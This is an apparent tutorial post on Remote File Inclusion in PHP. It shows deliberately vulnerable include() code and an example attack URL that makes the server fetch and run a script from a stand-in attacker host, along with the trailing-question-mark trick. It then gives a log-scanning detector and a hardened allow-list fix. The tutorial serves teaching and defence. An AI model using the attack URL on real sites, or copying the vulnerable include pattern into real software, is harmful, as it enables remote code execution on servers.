Remote File Inclusion
First of all, what is Remote File Inclusion? Commonly referred to as RFI, this is an uncommon form of web attack in which the attacker injects their own script and has the web server execute it. I like to call RFI the execution of unpredictable and uncontrollable code.
I'm sure many of you reading this have attempted RFI and are probably saying that it's a simple method of attack. But I'll bet that not many know what occurs behind the scenes, how it works, and why it works. Today I'll clarify that.
Let's say you have a site that is vulnerable to RFI, and it displays the site's main page as index.html. This is how the PHP on the vulnerable site could be written:
<?php
$file = $_GET['index']; // The page we wish to display
include($file);
?>
Code Examination:
OK, for those who don't know PHP, let me explain the code; for those who do, move right along :)
$ is used to declare a variable, and the = sign gives it a value. The value here is taken from the GET parameter named index, which is how index.html is fetched. Lastly, include($file) simply tells the server to include the file named in the variable $file in the page on which the code runs. So if you put this PHP code on the front page of the site, it will include index.html, and that's why you can see the index of the site.
Knowing this, an attacker can exploit the site using RFI like so:
http://www.site.com/index.php?index=http://www.attackersserver.com/my_evil_script.txt?
<?php
$file = "http://www.attackersserver.com/my_evil_script.txt?"; // what $_GET['index'] now contains
include($file); // $file is the script the attacker is including.
?>
As you can see, our variable $file no longer points to index.html; it now holds the script the attacker is including from a remote server, hence the name. Why does this work? Simply because the include() function lets you pull in files from a remote URL.
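On the defensive side, the request shape described above (an include-style parameter whose value is itself a URL) is easy to spot in web-server access logs. The following is an added example, not code from the original post: it scans constructed log lines in combined log format, percent-decodes the watched parameters, and reports any whose value begins with a URL scheme. The parameter names in SUSPECT_PARAMS and the sample addresses are assumptions for this example.

```php
<?php
// Added example (not part of the original post): find access-log requests whose
// include-style parameter carries a remote URL, i.e. the RFI request shape.
declare(strict_types=1);

// Parameter names commonly handed straight to include(); assumption for this example.
const SUSPECT_PARAMS = ['index', 'page', 'file', 'include'];

// Constructed sample log lines (combined log format, RFC 5737 test addresses).
// Line 3 is double percent-encoded to show why we decode more than once.
const SAMPLE_LOG = <<<'LOG'
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?index=index.html HTTP/1.1" 200 512
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?index=http://www.attackersserver.com/my_evil_script.txt? HTTP/1.1" 200 87
203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?index=%2568ttp%253A%252F%252F203.0.113.50%252Fx.txt HTTP/1.1" 200 87
198.51.100.4 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?index=about HTTP/1.1" 200 611
LOG;

/**
 * True if any watched query parameter in $requestTarget starts with a URL
 * scheme such as http:// or ftp:// once percent-encoding is removed.
 */
function hasRemoteIncludeParam(string $requestTarget): bool
{
    $query = parse_url($requestTarget, PHP_URL_QUERY);
    if (!is_string($query)) {
        return false;
    }
    parse_str($query, $params); // decodes one layer of percent-encoding
    foreach (SUSPECT_PARAMS as $name) {
        if (!isset($params[$name]) || !is_string($params[$name])) {
            continue;
        }
        // Decode a second time so double-encoded values are caught as well.
        $value = rawurldecode($params[$name]);
        if (preg_match('~^\s*[a-z][a-z0-9+.-]*://~i', $value) === 1) {
            return true;
        }
    }
    return false;
}

/** Return every log line whose request target looks like a remote include. */
function findRemoteIncludeAttempts(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // Pull the request target out of the quoted request line.
        if (preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[0-9.]+"/', $line, $m) !== 1) {
            continue;
        }
        if (hasRemoteIncludeParam($m[1])) {
            $hits[] = $line;
        }
    }
    return $hits;
}

// Lines 2 and 3 of the sample are reported; lines 1 and 4 are ordinary page names.
foreach (findRemoteIncludeAttempts(SAMPLE_LOG) as $hit) {
    echo "RFI attempt: {$hit}\n";
}
```

The check is deliberately narrow: it flags only values that begin with a scheme, so a legitimate page name never trips it, while the second decode pass means an attacker cannot hide the scheme behind an extra layer of percent-encoding. In practice the same logic belongs in a WAF rule or SIEM query, with the parameter list taken from the application's own include sites.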
As you can see, the attacker has included a .txt file and not a .php file. Why is that? If the attacker had used a .php extension and had PHP installed, the script would execute on his own server and not on the target's.
Also, you noticed that we added a ?. The reason is that it neutralises anything else that might be inside the include() call.
<?php
$file = $_GET['index'];
include($file . ".php");
?>
As you can see, there's more than just the variable $file in it, and that could pose an issue. The above script appends .php to any file that's being included. So if we included http://www.attackersserver.com/my_evil_script.txt without the ?, the server would really fetch http://www.attackersserver.com/my_evil_script.txt.php because of what's inside the include() call, which is BAD. So, to make sure nothing else inside the include() call takes effect, we add the ?: whatever is appended lands in the URL's query string instead of the path, and the remote server ignores it.
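The fix, as an added example that is not code from the original post: the request chooses a short page name, that name is looked up in a fixed allow-list, and include() is handed only the resulting on-disk path, so user input never reaches include() at all, with or without a trailing ?. The pages directory and file names are assumptions for this example. Independently of the code, the remote fetch in include() only works when the php.ini directive allow_url_include is On; it has defaulted to Off since PHP 5.2.0 and is deprecated as of PHP 7.4, so confirming that it is Off is the first check to make on any server.

```php
<?php
// Added example (not from the original post): a hardened replacement for
// include($_GET['index']). The request controls only a page name, which is
// looked up in a fixed allow-list; include() never sees user input, a URL,
// or a path fragment. PAGES_DIR and the file names are assumptions.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';

// Allow-list: request value => file on disk. Anything not listed is rejected.
const PAGES = [
    'index'   => 'index.html',
    'about'   => 'about.html',
    'contact' => 'contact.html',
];

/**
 * Resolve a request value to an absolute path inside PAGES_DIR,
 * or return null if it is not an allowed page.
 */
function resolvePage(?string $requested): ?string
{
    // Default page when the parameter is absent.
    $name = $requested ?? 'index';

    // Exact match against the allow-list; no normalisation, no guessing.
    if (!array_key_exists($name, PAGES)) {
        return null;
    }

    // Defence in depth: confirm the resolved file really lives under PAGES_DIR,
    // so a mistake in the allow-list cannot escape the directory either.
    $path = realpath(PAGES_DIR . '/' . PAGES[$name]);
    $base = realpath(PAGES_DIR);
    if ($path === false || $base === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

$page = resolvePage($_GET['index'] ?? null);
if ($page === null) {
    // Unknown page: fail closed rather than falling back to the raw input.
    http_response_code(404);
    echo 'Page not found';
    exit;
}
include $page;
```

Two design points are worth noting. First, the allow-list is keyed on exact strings, so there is nothing to normalise and no way to smuggle a scheme, a traversal sequence or a trailing ? through it: an unknown key simply yields a 404. Second, the realpath check is redundant with a correct allow-list, and that is the point; it keeps a later editing mistake in PAGES from turning back into a file-inclusion bug.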
Well, that's it folks. I hope you learned more about RFI than you knew before. Many of you might know this, others not so much, but I hope it was able to help some people out.